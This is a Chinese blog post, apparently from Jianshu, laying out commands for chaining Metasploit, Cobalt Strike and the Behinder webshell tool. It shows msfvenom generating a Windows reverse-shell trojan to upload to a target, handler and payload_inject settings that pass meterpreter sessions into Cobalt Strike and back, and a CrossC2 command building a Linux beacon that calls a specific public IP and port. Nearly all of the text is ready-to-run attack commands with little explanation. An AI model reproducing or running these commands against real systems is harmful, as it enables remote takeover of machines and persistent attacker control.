MSF、CS、冰蝎聯(lián)動

1、MSF生成木馬

https://www.cnblogs.com/bmjoker/p/10051014.html
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
linux木馬工具 https://github.com/gloxec/CrossC2/blob/cs4.1/README_zh_full.md
image.png

將木馬上傳至靶機

2、msf控制木馬

啟用msf:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1234
image.png

image.png
run
image.png

3、靶機端木馬執(zhí)行

image.png

4、msf控制端獲取靶機信息

image.png

5、CS端配置新的監(jiān)聽

注意payload是http協(xié)議


image.png

6、msf控制端啟用bg

background
image.png
啟用payload_inject模塊
use  exploit/windows/local/payload_inject
image.png

7、msf端配置設置payload

set payload windows/meterpreter/reverse_http
image.png

8、msf端配置設置IP和端口

set lhost 192.168.1.5
set lport 6666
image.png

8、將session 1 轉給cs端

image.png

8、CS端看到靶機信息

image.png

9、CS->MSF

MSF監(jiān)聽:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 3344
run
CS:spawn 監(jiān)聽器
監(jiān)聽器:windows/foreign/reverse_http msf_IP msf_端口

10、冰蝎->MSF->CS

https://github.com/rebeyond/Behinder/releases/
#后滲透CS-CrossC2上線Linux主機
https://github.com/gloxec/CrossC2/
1.自己生成:
./genCrossC2.Linux 47.242.218.253 6666 null null Linux x64 test
2.配置插件生成:https://www.cnblogs.com/xuanlvsec/p/14240479.html
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

  • CobaltStrike是一款美國RedTeam開發(fā)的滲透測試神器,常被業(yè)界人稱為CS。最近這個工具大火,成為了滲...
    卿酌南燭_b805閱讀 5,417評論 0 3
  • CobaltStrike是一款美國RedTeam開發(fā)的滲透測試神器,常被業(yè)界人稱為CS。最近這個工具大火,成為了滲...
    卿酌南燭_b805閱讀 5,880評論 3 14
  • 1 msf獲取shell 這里已經在用msf生成了exe 然后直接msf開啟監(jiān)聽然后獲取shell msf生成ex...
    wssmile閱讀 3,426評論 0 0
  • 相關資源列表 https://mitre-attack.github.io/ mitre科技機構對攻擊技術的總結w...
    蒼簡閱讀 4,151評論 0 11
  • smb其它漏洞Linux smb漏洞(CVE-2017-7494)復現(xiàn)(使用老版本) 查看samba版本并打開sa...
    卿酌南燭_b805閱讀 4,369評論 0 0

友情鏈接更多精彩內容